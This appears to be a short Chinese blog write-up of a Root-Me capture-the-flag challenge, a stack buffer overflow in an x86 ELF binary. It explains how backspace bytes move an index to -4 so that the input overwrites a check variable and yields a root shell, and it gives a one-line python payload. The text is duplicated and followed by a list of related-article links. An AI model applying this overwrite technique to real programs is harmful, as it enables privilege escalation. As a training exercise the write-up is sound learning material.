roome-ELF x86 - Stack buffer overflow basic 3
2018-01-27 17:36
706 查看
程序源码:
程序每次从输入流中读取一个字符并进行比对,过滤了“\n”,0x04,0x90字符,通过count字符充当下标,同时限制了输入数量
题目需要将check的值改成0xbffffabc,获取root权限,读取passwd
注意本题局部变量的定义顺序:buffer->check->i->count
栈中的布局应该是
因此我们需要覆盖buffer底部的check(注意栈的增长方向),利用常用填充buffer的方法是无法做到的,幸好这道题的count可用作buffer的下标,将count改为-4就可以覆盖掉check的内容
payload:
python -c ‘print “\x08\x08\x08\x08”+”\xbc\xfa\xff\xbf”’;cat
程序每次从输入流中读取一个字符并进行比对,过滤了“\n”,0x04,0x90字符,通过count字符充当下标,同时限制了输入数量
题目需要将check的值改成0xbffffabc,获取root权限,读取passwd
注意本题局部变量的定义顺序:buffer->check->i->count
栈中的布局应该是
因此我们需要覆盖buffer底部的check(注意栈的增长方向),利用常用填充buffer的方法是无法做到的,幸好这道题的count可用作buffer的下标,将count改为-4就可以覆盖掉check的内容
payload:
python -c ‘print “\x08\x08\x08\x08”+”\xbc\xfa\xff\xbf”’;cat
相关文章推荐
- stack-based buffer overflow basic paper
- MySQL Stack Buffer Overflow Linux x86 32bits
- 福昕阅读器 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow
- Unable to execute dex: java.nio.BufferOverflowException. Check the Eclipse log for stack trace.
- Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server
- 【嵌入式安全扫盲一】Stack buffer overflow
- Android 报错:Conversion to Dalvik format failed: Unable to execute dex: java.nio.BufferOverflowException. Check the Eclipse log for stack trace.
- Unable to execute dex: java.nio.BufferOverflowException. Check the Eclipse log for stack trace.
- Unable to execute dex: java.nio.BufferOverflowException. Check the Eclipse log for stack trace.
- 【嵌入式安全扫盲一】Stack buffer overflow
- 解决Unable to execute dex: java.nio.BufferOverflowException. Check the Eclipse log for stack trace.
- Unable to execute dex: java.nio.BufferOverflowException. Check the Eclipse log for stack trace.
- Unable to execute dex: java.nio.BufferOverflowException. Check the Eclipse log for stack trace.
- java.nio.BufferOverflowException. Check the Eclipse log for stack trace.
- Unable to execute dex: java.nio.BufferOverflowException. Check the Eclipse log for stack trace.
- Unable to execute dex: java.nio.BufferOverflowException. Check the Eclipse log for stack trace.
- CWE-121: 基于栈的溢出(Stack-based Buffer Overflow)
- Unable to execute dex: java.nio.BufferOverflowException. Check the Eclipse log for stack trace.